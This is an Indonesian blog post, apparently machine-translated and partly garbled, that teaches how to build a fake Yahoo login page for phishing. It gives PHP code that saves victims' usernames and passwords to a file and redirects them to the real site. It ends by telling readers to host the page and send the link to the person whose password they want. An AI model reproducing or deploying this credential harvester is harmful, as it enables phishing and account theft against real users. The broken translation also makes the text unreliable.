Saya membahas tentang bagaimana halaman login palsu yang digunakan oleh hacker untuk hack password Anda dan bagaimana melindungi diri dari kemudian di posting saya sebelumnya
Lindungi diri Anda dari halaman login palsu
Sekarang waktunya untuk mendapatkan satu untuk diri sendiri. Jadi mari kita belajar cara membuat sebuah halaman login palsu dengan YahooMail sebagai contoh. Prosedur yang sama dapat diterapkan untuk orkut, myspace, gmail, facebook, paypal ...
Pertama buka halaman login yahoo, jika Anda menggunakan internet explorer klik kanan pada halaman login dan sumber tampilan pilih untuk ctr + u mozilla tekan . Salin seluruh kode ke notepad atau editor teks favorit Anda. Sekarang pencarian untuk "istilah" tindakan, Anda harus mencari baris seperti ini
< form method=”post” action=”https://login.yahoo.com/config/login?”autocomplete=”off” name=”login_form” onsubmit=”return hash2(this)”>
When you enter your login information in the original login page, it is
disampaikan kepada url ini https: / / login.yahoo.com / config login / perubahan https: / / login.yahoo.com / config / login ke "input.php". Bila Anda mengubah tindakan untuk input.php, nama pengguna dan password dikirimkan ke berkas ini kapan saja pengguna memasukkan informasi login di halaman login palsu kita.
Menciptakan input.php
Pertama mari kita lihat kode untuk bentuk HTML sederhana
1)
action = "input.php" katakan adalah browser untuk
menyerahkan input.php informationto. Pada baris 2 dan 4 line kita memiliki "jenis teks =" dan "type = password" ini memberitahu browser jenis masukan. nama = "username" dan nama = "passwd" menyimpan nama pengguna dan password di variabel bernama $ _POST [ username] dan $ _POST [] passwd. Baris 5 menampilkan tombol kirim bila pengguna menekan tombol ini formulir tersebut diajukan. (Catatan: Saya menggunakan nomor hanya untuk menjelaskan kode)
Pertama membuat catatan dari nama yang digunakan untuk kedua variabel username dan passowrd. Dalam contoh di atas bentuk yang mereka username dan passwd
Kode PHP dengan penjelasan:
/ / Setiap program php dimulai dengan tag ini
< ?php
/ * Membuka passwd.htm untuk menambahkan, jika tidak
sekarang ini menciptakan satu * /
$ Fp = fopen ("passwd.htm", "a");
/ * Menulis nama pengguna dan password disimpan dalam
$ _POST [Username] dan Password: $ _POST [passwd] di passwd.htm
"\ T" hanya untuk menyisipkan spasi beberapa antara nama pengguna
dan password * /
fwrite ($ fp, "Username: $ _POST [username] \ tPassword: $ _POST [passwd]");
/ * Ini bagian dari kode ini menciptakan sebuah halaman HTML yang
mengarahkan ulang pengguna ke halaman error asli gmail
Yang akan Anda dapatkan jika Anda memasukkan sandi yang salah
* /
echo " < HTML>
< head>
< title>Welcome to Gmail< /title>
< FRAMESET cols=\”*\”>
< FRAME src=\”https://www.yahoo.com/\”>
< /FRAMESET>”;
?> / / php tag penutup
Untuk membuat input.php Anda sendiri ...
Jika nama variabel yang digunakan adalah login dan password, maka Anda harus mengubah $ _POST [username] dan $ _POST [passwd] untuk $ _POST [login] dan $ _POST [] password. Ini semua, Anda selesai dengan membuat halaman login palsu sepenuhnya beroperasi. upload halaman login palsu dan input.php pada beberapa server dengan dukungan php dan memberikan link kepada orang yang sandi yang ingin Anda hack. Ketika orang yang masuk dalam rincian login di halaman login palsu Anda, mereka akan disimpan di password.htm. Anda bahkan dapat mengkonfigurasi input.php untuk mendapatkan username dan password dalam kotak masuk Anda. Untuk itu Anda perlu tahu sedikit lebih php. Jika ada orang yang tertarik untuk mengetahui tentang hal itu merasa bebas untuk menghubungi saya langsung atau drop dalam komentar di sini.
W3Schools
CATATAN : variabel php bersifat case sensitive , jika Anda mencoba menjalankan input.php langsung pada comp Anda tanpa menginstal web server yang didukung dengan php itu tidak akan berhasila< /a>< /noscript>
Langganan:
Posting Komentar (Atom)
CaLendaR
Powered by Calendar Labs
1 komentar:
ajari secara detailx maklum pemula..
thanks atas bantuannya dan ilmunya teman
Posting Komentar